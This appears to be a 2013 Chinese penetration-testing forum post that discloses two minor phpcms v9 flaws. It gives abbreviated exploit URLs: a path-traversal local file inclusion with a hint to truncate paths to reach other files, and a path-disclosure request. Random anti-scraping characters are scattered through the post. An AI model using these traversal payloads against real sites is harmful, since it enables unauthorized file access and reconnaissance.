中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
; ~9 c9 g4 l; X a0 m
+ U; |$ q2 x5 j0 k7 ^( Z
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
3 i2 @& t2 N$ |" S x$ s
) ~- U+ H: B' d) j7 G! Y/ U
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
" ]( O) P, g d4 Y" C, ?
- B0 s* l s) o H
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
9 {- t6 h0 O8 b7 v1 Z: [) H1 W
" I/ J: |$ N* d. T4 C; {
#暴路径
( E$ U' H2 M6 C$ C1 c9 T+ O% N* r1 Y
, w7 V2 E* E& |% n
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
6 [6 n8 a+ U( f4 d$ a3 @, Y4 O
3 |: [9 X+ h' C0 c+ Y
! c+ `+ u# u; }/ _, a1 O) g
( T7 x% T( B! Z( s- e4 V% ?7 w
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2